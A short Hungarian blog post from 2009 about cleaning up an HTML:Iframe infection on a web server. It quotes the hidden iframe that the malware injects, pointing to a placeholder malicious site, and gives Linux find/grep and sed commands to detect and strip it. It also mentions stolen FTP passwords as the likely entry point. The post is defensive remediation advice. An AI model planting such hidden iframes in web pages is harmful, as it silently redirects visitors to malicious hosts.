HTML:Iframe fertőzés, vírus, felismerés, javítás

Sajnos nem régen találkoztam egy HTML:Iframe fertőzéssel, mely igen agresszíven támadta az összes olyan php, asp, htm, html fájlt melyben <html>, <body> tag volt. Valamint megtámadta azokat a fájlokat is melyekben nem volt ugyan ilyen html tag, de a fájlnév tartalmazta az "index" szót.

Maga a fertőzés nagyon könnyen észrevehető, ugyan is a következő kódot szúrja be a fent említett fájlokba:

<iframe src="http://kártékony.oldal" width=147 height=184 style="visibility: hidden"></iframe>

Ahol talál <body> tagot ott rögtön a tag után szúrja be, ahol nem ott egyszerűen a fájl végére illeszti a kódot.

A fertőzés keresése (linux alatt):

find . -iname "*index*" | xargs grep "<iframe"

Ez a rövid script kilistáz minden olyan fájl, melynek a neve tartalmazza az "index" szót, valamint a tartalmában megtalálható az "<iframe" részlet...

A fertőzés eltávolítása (linux alatt):

Szerver oldalon ezt a fertőzést gyorsan orvosolhatjuk, javíthatjuk a következő rövid scripttel:

find . -iname "*index*" -exec sed -i 's/<iframe.*.*iframe>//g' {} \;

rövid magyarázat:

find . -iname "*index*" : megkeresi azokat a fájlokat melyek nevében megtalálhat az alábbi minta: *index* (javasoljuk a *.php használatát, illetve *.htm, *.html, *.asp ...)

-exec sed -i 's/<iframe.*.*iframe>//g' {} \; : a find által talált fájlokban megkeresi a "<iframe...bármilyen szöveg...iframe> részt és lecseréli egy szóközre.

Mindenek előtt csináljunk egy biztonsági másolatot mielőtt a scriptet lefuttatnánk!

Sajnos valószínűsíthető, hogy a fertőzést megelőzi egy ftp jelszó lopás is. Ugyanis a totalcommander és egyéb programok az ftp jelszavakat mesterjelszó nélkül is visszafejthetően tárolják, ezt egy esetleges vírus kihasználva már hozzáférést is szerez a vírus gazdájának, aki ezek után egész sok bosszúságot okozhat.

Remélem rövid írásom segít azoknak akik hasonló helyzetbe kerülnek!

Megjelent: 3763 alkalommal Utoljára frissítve: 2009. szeptember 16., szerda 11:36

Címkék: